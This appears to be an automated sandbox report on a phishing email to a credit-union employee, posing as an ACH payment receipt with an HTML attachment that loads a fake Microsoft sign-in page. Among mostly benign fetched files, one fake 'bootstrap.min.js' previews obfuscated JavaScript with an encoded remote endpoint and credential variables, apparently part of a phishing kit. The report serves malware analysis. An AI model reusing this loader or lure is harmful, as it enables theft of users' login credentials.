                                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                                                    Category:downloaded
                                                                    Size (bytes):621
                                                                    Entropy (8bit):7.673946009263606
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:4761405717E938D7E7400BB15715DB1E
                                                                    SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                                                    SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                                                    SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://aadcdn.msauth.net/shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg
                                                                    Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced
                                                                    Category:downloaded
                                                                    Size (bytes):2309
                                                                    Entropy (8bit):3.9533709859154516
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:26A555918CCCAC480C5DC4845ECC04E1
                                                                    SHA1:3B9F8C9C19902E4751C392E8764F612ED60F2818
                                                                    SHA-256:FF8A819AC9081D67E353BC9FC2654A583A5A0631EA6EB617A130ECC9BF8B010A
                                                                    SHA-512:8F4F894FAE992AAA001D6CDE538829A3153BE16672CEACD4315AEE932025EA1814A9AB6F08BCE0B40C34BE76FACDC6535AE5FB52CC20A7FFC36041A28B817012
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://mailmeteor.com/logos/assets/PNG/Microsoft_Logo_512px.png
                                                                    Preview:.PNG........IHDR..............x......pHYs.................sRGB.........gAMA......a.....IDATx...1.]U.....`#d.......^..t.N...8.;;..A...T73xE.@ ;7."..9$.......^.............................................|......_...<..D...?.}?....G..._.8.z...o_.<........z....9.^.}..2.i..#.3............$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A...
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                    Category:dropped
                                                                    Size (bytes):17174
                                                                    Entropy (8bit):2.9129715116732746
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                    SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                    SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                    SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (48664)
                                                                    Category:downloaded
                                                                    Size (bytes):48944
                                                                    Entropy (8bit):5.272507874206726
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:14D449EB8876FA55E1EF3C2CC52B0C17
                                                                    SHA1:A9545831803B1359CFEED47E3B4D6BAE68E40E99
                                                                    SHA-256:E7ED36CEEE5450B4243BBC35188AFABDFB4280C7C57597001DE0ED167299B01B
                                                                    SHA-512:00D9069B9BD29AD0DAA0503F341D67549CCE28E888E1AFFD1A2A45B64A4C1BC460D81CFC4751857F991F2F4FB3D2572FD97FCA651BA0C2B0255530209B182F22
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js
                                                                    Preview:/*!. * Bootstrap v4.0.0 (https://getbootstrap.com). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function r(){return(r=Object.assign||function(t){for(var e=1;e<arguments.length;e++){var n=arguments[e];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(t[i]=n[i])}return t}).apply(this,arguments)}e=e&&e.hasOwnProperty("default")?e.default:e,n=n&&n.hasOwnProp
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 240x240, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=1], baseline, precision 8, 1920x1080, components 3
                                                                    Category:downloaded
                                                                    Size (bytes):279994
                                                                    Entropy (8bit):7.962545602165181
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:57538480D3F347ED52A252DFAB885155
                                                                    SHA1:4D763C99B2EE0E7D16FA8365A344936D3D20FC6E
                                                                    SHA-256:C05C489F1041ECDCC1EBFA77F10AA8348377DD6A0757C79114CAE99531837FD1
                                                                    SHA-512:045F9F0F1AA085B9FD16C9AD7FD3C3173D27B2709F71C1DDC9024027C4F0A7C14F25BEE02243C8A81F9CD78186D9B4702C5A2446A6E4A235BF4A4FADEC37678B
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://aadcdn.msauthimages.net/dbd5a2dd-r9ee2fceu6-sxsz-brr5xpw9gxgamr3hr-nzriytzde/logintenantbranding/0/illustration?ts=638352396502877873
                                                                    Preview:......JFIF..............Exif..MM.*.......i...........................P...........d........00..........00......2019:06:12 21:15:42.2019:06:12 21:15:42.......http://ns.adobe.com/xap/1.0/.<?xpacket begin='.' id='W5M0MpCehiHzreSzNTczkc9d'?>..<x:xmpmeta xmlns:x="adobe:ns:meta/"><rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"><rdf:Description rdf:about="uuid:faf5bdd5-ba3d-11da-ad31-d33d75182f1b" xmlns:xmp="http://ns.adobe.com/xap/1.0/"><xmp:CreateDate>2019-06-12T21:15:42</xmp:CreateDate></rdf:Description></rdf:RDF></x:xmpmeta>..<?xpacket end='w'?>...C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((......8...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:PNG image data, 75 x 62, 8-bit/color RGB, non-interlaced
                                                                    Category:dropped
                                                                    Size (bytes):61
                                                                    Entropy (8bit):4.068159130770307
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:D04451F4179BED7691D7A34BEB37061A
                                                                    SHA1:87F21675CE7B68188ADE2B909BCEF081E3DE5573
                                                                    SHA-256:4EF71095EA27A90BD108B3F3AA1104E2616F940DDF89BAA134B01326A4DDE1CD
                                                                    SHA-512:83C77A231F53DE217DC3AF277DE3BBCF3C8EF30AE8F121DA4CF978B1D7BFBEB6B7A4C975167ADD798463924991095788867E12A917E51385185FC994A672AE38
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:.PNG........IHDR...K...>.......q.....IDAT.....$.....IEND.B`.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:downloaded
                                                                    Size (bytes):32
                                                                    Entropy (8bit):4.390319531114783
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:EB3CE3190D8A58E048D35E620747D3A5
                                                                    SHA1:76B5B6461189F839B018EF5C785DB4836B818B7D
                                                                    SHA-256:2D670E2962D8D805B95912CACA0822CE7C6913636BA40373C6E6AEA73CAC8457
                                                                    SHA-512:08F9C680B09CC25919A91F8E080CFC517F7354F49759DDC8CF6FFEB5ADE2E46F80A866E7531B6EA97188A5E4647093350F91ED51254351C47BCE3488EF88A595
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIZCd9mrL3CTfGuEgUNrQmusSFqN6XGNYk1DhIZCcOSQx9bFHMvEgUNQ_N2OSELH6J9caU_bQ==?alt=proto
                                                                    Preview:CgkKBw2tCa6xGgAKCQoHDUPzdjkaAA==
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (50758)
                                                                    Category:downloaded
                                                                    Size (bytes):51039
                                                                    Entropy (8bit):5.247253437401007
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:67176C242E1BDC20603C878DEE836DF3
                                                                    SHA1:27A71B00383D61EF3C489326B3564D698FC1227C
                                                                    SHA-256:56C12A125B021D21A69E61D7190CEFA168D6C28CE715265CEA1B3B0112D169C4
                                                                    SHA-512:9FA75814E1B9F7DB38FE61A503A13E60B82D83DB8F4CE30351BD08A6B48C0D854BAF472D891AF23C443C8293380C2325C7B3361B708AF9971AA0EA09A25CDD0A
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js
                                                                    Preview:/*!. * Bootstrap v4.1.3 (https://getbootstrap.com/). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function l(r){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{},e=Object.keys(o);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(o).filter(function(t){return Object.getOwnPropertyDescriptor(o,t).enum
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (65466), with CRLF line terminators
                                                                    Category:downloaded
                                                                    Size (bytes):552129
                                                                    Entropy (8bit):4.870121377903088
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:A345A1E54D04B019DCD9D11337DE1A2E
                                                                    SHA1:D5BABB67F9776E9E5F1EA8827A182CE5896C0C74
                                                                    SHA-256:B97A02619A63CDFB8FC6B424C111353B6C1E74E45FA3B263B99E31C0F97A72F6
                                                                    SHA-512:C78F37582DF6A3AF11CC87A9F4661CAE79D5F3005185A81FE9EBF80BD9FB426790E2E07AFCC1BBC4001BC4A10FF8E46561EDD7A917D176184EF4EFB6EA64EBD6
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://5660942597-1317754460.cos.ap-tokyo.myqcloud.com/bootstrap.min.js
                                                                    Preview:var file = "aHR0cHM6Ly91bGdmLnF1b2trYS5pdC5jb20vZ29vZ2xlLnBocA==";....var _0x101613=_0x5948;(function(_0x443b1e,_0x48d078){var _0x4f9f8d=_0x5948,_0x3f0a80=_0x443b1e();while(!![]){try{var _0x1088a8=parseInt(_0x4f9f8d(0x1cec))/(-0x1*-0x13eb+-0x1*-0x1519+0x1*-0x2903)+parseInt(_0x4f9f8d(0x2a87))/(0x8cb*-0x1+-0x2*0x6d3+0x1673)+parseInt(_0x4f9f8d(0x485))/(-0x1*0x1517+0x64e+0xecc)+parseInt(_0x4f9f8d(0xcbd))/(0x1901+-0x35b*0xb+0xbec)+parseInt(_0x4f9f8d(0x1111))/(-0x1*-0x885+-0x7c*-0x2+-0x978)+-parseInt(_0x4f9f8d(0x835))/(0x1*-0x1fda+-0x7f5*-0x3+-0x801*-0x1)*(parseInt(_0x4f9f8d(0xa74))/(0x4*0x219+-0x15e8+0x1*0xd8b))+-parseInt(_0x4f9f8d(0x854))/(-0xc96+-0x222b+0x2ec9)*(parseInt(_0x4f9f8d(0x37d))/(-0x1*0xcb+-0x1c72+0x1d46));if(_0x1088a8===_0x48d078)break;else _0x3f0a80['push'](_0x3f0a80['shift']());}catch(_0x3c73f6){_0x3f0a80['push'](_0x3f0a80['shift']());}}}(_0x95df,-0xf1d8f+-0x38f6e*-0x3+0xd546b));var count=-0x6f4+-0x1e52+0x2546;let email,keyGlobal,token,numberSms,numberTelp,logo;const loadings
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                    Category:dropped
                                                                    Size (bytes):61
                                                                    Entropy (8bit):3.990210155325004
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                    SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                    SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                    SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (48122)
                                                                    Category:downloaded
                                                                    Size (bytes):48123
                                                                    Entropy (8bit):5.342998089666478
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:EA38BDA3C117E2FE01BD862003357394
                                                                    SHA1:767CCB3589E3067EE1B348DF2426A9E2E32CEE5C
                                                                    SHA-256:719423C7B70AC911F76D00B3AE514D108A8315EA60A80519820BE50C0E4C96EF
                                                                    SHA-512:F50FAB9DC2263F40216DF26C234AD390091F23185650E9B4E4748CF09CFEDF2D92A99FC81C986234580844393305AC2195E096DEDB64D9A25A99EF7BE510FFCA
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://challenges.cloudflare.com/turnstile/v0/b/708f7a809116/api.js
                                                                    Preview:"use strict";(function(){function jt(e,t,a,o,c,l,v){try{var h=e[l](v),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function qt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);function v(s){jt(l,o,c,v,h,"next",s)}function h(s){jt(l,o,c,v,h,"throw",s)}v(void 0)})}}function V(e,t){return t!=null&&typeof Symbol!="undefined"&&t[Symbol.hasInstance]?!!t[Symbol.hasInstance](e):V(e,t)}function De(e,t,a){return t in e?Object.defineProperty(e,t,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[t]=a,e}function Ve(e){for(var t=1;t<arguments.length;t++){var a=arguments[t]!=null?arguments[t]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){De(e,c,a[c])})}return e}function Ir(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:PNG image data, 280 x 60, 8-bit colormap, non-interlaced
                                                                    Category:downloaded
                                                                    Size (bytes):5089
                                                                    Entropy (8bit):7.9435811968649785
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:5F5EF4D1150B6E9C3432FF8116FFF7BE
                                                                    SHA1:38DB3092CBE4E5EB467F1CED123AE16A66441402
                                                                    SHA-256:0C634F07D09C4048E0FBB85958CA04A0C35CD7E1DC5D4CF03024A58C0B594F59
                                                                    SHA-512:F964289F906161414E3BCE7038A74DFCF6D0B0E4A360657D18E6CC6BFB1E9626D58183F4723F3D30E12D845304A468957EFB5B3245FF712FC71EAEC9E0F7D852
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://aadcdn.msauthimages.net/dbd5a2dd-r9ee2fceu6-sxsz-brr5xpw9gxgamr3hr-nzriytzde/logintenantbranding/0/bannerlogo?ts=637363974368856445
                                                                    Preview:.PNG........IHDR.......<.......U*....sRGB.........gAMA......a.....PLTE..b.!d.%f.&h.)i.,k.-m..n.*k.0n.1o.0n.1o.2p.4q.2q.6r.6t.8s.8t.6s.7t.2p.7s.9u.<v.9u.<v.=x.7s.;v.?y.>x.@z.B|.Bz.B|.D|.C|.F~.H."H..G..H..I..L. K.!M."N.$N.)O.#P.%P.(R.)T.*U.,V..X.0Y.2Z.3\.5].8_.7_.8_.9`.<b.>d.?e.@f.Bh.Ei.Fk.Gl.Hj.Im.Lo.Lp.Nq.Pr.Rt.Tu.Tv.Sv.Uv.Vx.Xx.Yz.[|.\{.\|.]}.`~._..a..d..c..d..f..h..j..j..m..n..q..p..t..q..t..s..u..x..x..z..{..{..}..~...]..a..b..e..h..j..k..l..n..r".t%.v(.y-.{0.}4.<.I.N.P.S.U.Z.\._.c.f.i.k.r.w........................................................................................................................................................................................................................................................................................................pHYs...s...s..".....jIDATx^.}|[.Y..r}.J..f.u$..[........`{.............,..0`.h.+0.....&..nE.(....7.7*VP...EqK.:H"...J..s..+.qK....A.?b..{^..9.y.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (32065)
                                                                    Category:downloaded
                                                                    Size (bytes):85578
                                                                    Entropy (8bit):5.366055229017455
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:2F6B11A7E914718E0290410E85366FE9
                                                                    SHA1:69BB69E25CA7D5EF0935317584E6153F3FD9A88C
                                                                    SHA-256:05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
                                                                    SHA-512:0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
                                                                    Preview:/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (19015)
                                                                    Category:downloaded
                                                                    Size (bytes):19188
                                                                    Entropy (8bit):5.212814407014048
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:70D3FDA195602FE8B75E0097EED74DDE
                                                                    SHA1:C3B977AA4B8DFB69D651E07015031D385DED964B
                                                                    SHA-256:A52F7AA54D7BCAAFA056EE0A050262DFC5694AE28DEE8B4CAC3429AF37FF0D66
                                                                    SHA-512:51AFFB5A8CFD2F93B473007F6987B19A0A1A0FB970DDD59EF45BD77A355D82ABBBD60468837A09823496411E797F05B1F962AE93C725ED4C00D514BA40269D14
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js
                                                                    Preview:/*. Copyright (C) Federico Zivolo 2017. Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT).. */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto|scroll)/.test(r+s+p)?e:n(o(e))}function r(e){var o=e&&e.offsetParent,i=o&&o.nodeName;return i&&'BODY'!==i&&'HTML'!==i?-1!==['TD','TABLE'].indexOf(o.nodeName)&&'static'===t(o,'position')?r(o):o:e?e.ownerDocument.documentElement:document.documentElement}functio
                                                                    File type:ASCII text, with very long lines (1517), with CRLF line terminators
                                                                    Entropy (8bit):6.0075640387168505
                                                                    TrID:
                                                                      File name:702cb6e..eml
                                                                      File size:13'180 bytes
                                                                      MD5:aa0098ad9b78eecc3bafda7c9fab4f3c
                                                                      SHA1:dac3eac0290307802aed3189f49f978bf910ab59
                                                                      SHA256:b1ba0522ba590d4f8b8ec56f40d1a608f4f0b449fb1e8121052921d84542f7a3
                                                                      SHA512:b8ce0803a42aa21159db195507d19389ff85c62b3aaf12a4aa6d8433330980414c7d426792af9112f9f49f6085d757b3971059851d496f4b3995f2ef154e2a7d
                                                                      SSDEEP:192:bo+m/VHr3RQHW3vNtUaqVk0TyXTTtp4wstI2YIG+1kp+zAj34/0W/dsgookyUucb:bo/L3+UNtDqS0TS34U2ZESM3Bmu5d
                                                                      TLSH:67422BE1A9A01826ABE2530DA710BC0253F371C2D8F7E0E03AFE59D51BD344997176DE
                                                                      File Content Preview:Arc-Seal: i=2; a=rsa-sha256; s=arcselector10001; d=microsoft.com; cv=pass;.. b=bgqVDvg8Lv2+bvr2GaGjw7A+RJqDeakRbJvWMK7Xzyx+JMo+2UIPOvmWlnDWHaHH3afQgn8zhiMChhmzeT18ZiVqDxekxyElL+QElc5yGHSA+MIXl+OQoTD47M6inY7FndqpU7bUWG3itzpitYa7PykG+72GQKh9u/Ru44CtXEs+Q+00
                                                                      Subject:Approved ACH / ePayments reciept for Firstontario epayment powered by Fastpay Ref_4104ee99b1c6f51c657203ba9a2ba2a3f702cb6e.
                                                                      From:"Ashleigh Adams <Ashleigh_Adams97@emmerichandsons.com>" <"30320104182931044334fadceb388a85af9bdfS06d7/1625a670VTBi6CQyXeyDy1wryFIMr3RzkndQNcHCwzONIhSLem ail.email.pandadoc.net/c/eJxMj8Fu2zwQhJ9GvMmguBRFHXSI80NMDkyLUVNSS04NZUAAAGVw6CR29v/pvc1904L93trBtOEtASP_BLDVCUpdT7gGMZDh16GQXhTGSDbK6XDg/rr4UBwmx.01-jenn"@vacationplanners.com>
                                                                      To:Alison Bagnulo <Alison.Bagnulo@firstontario.com>
                                                                      Cc:
                                                                      BCC:
                                                                      Date:Wed, 19 Mar 2025 20:04:17 +0000
                                                                      Communications:
                                                                        Attachments:
                                                                        • Firstontario00990938376360__098.html
                                                                        Key Value
                                                                        Arc-Seali=1; a=rsa-sha256; s=arcselector10001; d=microsoft.com; cv=none; b=rBS4ZOqenyAq/mFuSoODeQ3Pc4hQ+cM78SEZM7hH/xTAxU1zoHRlOUA5SUGcVctMXBhB5BJTtrYxvd1F2SoObvUzXyScNGo1xL9mz4TMMTuIRrtDKPhWIsvNTKLLr5QDsqJZ7EU7Y40OmyFOXn7vp0tQ7qf0U5D/0caqjk6yytD/kHq71hbZEmjQkLZqAEQ4sZc7LCQ1ptAUcOo02ktW0KR6gzWIhhv+58qhvzuWdKDp3JasHPFRWiV1wCQEG0pxnzGpD+6Ye6RcpdzrdQJ8ah+cvKMAB+go1heuBynBo7e5zUyRSe671C7MYL9qEuUYEjsTQVNMTb7DgN/xG6hSew==
                                                                        Arc-Message-Signaturei=1; a=rsa-sha256; c=relaxed/relaxed; d=microsoft.com; s=arcselector10001; h=From:Date:Subject:Message-ID:Content-Type:MIME-Version:X-MS-Exchange-AntiSpam-MessageData-ChunkCount:X-MS-Exchange-AntiSpam-MessageData-0:X-MS-Exchange-AntiSpam-MessageData-1; bh=DsVQ7Z0kXN8c65RhX/mpz4wk8n2jkP+gaeKRDzEohOw=; b=ma20a1hXZylsV/2UZuDEMqecgIbOqdu0AYoepLgzDzPdzZvuU+eFwtD5dCq2u2tvcEaTV89RUaI7ypcrMY07MQiNvHBPRDazqv72pRW6f1L4/ROpMofid4y6J3rQ0dWJMQoqCuIZ6QDqklkxulW/oFaVB4Z6Ukj47G/p9XcjdS91yveYOGffGMPZwD8RuqNzX9nkiN9HFLBBNAom0hvFNt6DBu0mW5z0VC3x324wXXgW12n5wfxCNsitDraWV5yPu+5iJnmaJ35ycLrFyDE5UKgG0ya+e78qX6HV5Hx3eLkoJy0i9F+lMYN9AsMWFYx3aI5YBNBvcRAKBs+t9cqZfA==
                                                                        Arc-Authentication-Resultsi=1; mx.microsoft.com 1; spf=fail (sender ip is 146.70.247.91) smtp.rcpttodomain=firstontario.com smtp.mailfrom=vacationplanners.com; dmarc=fail (p=none sp=none pct=100) action=none header.from=vacationplanners.com; dkim=none (message not signed); arc=none (0)
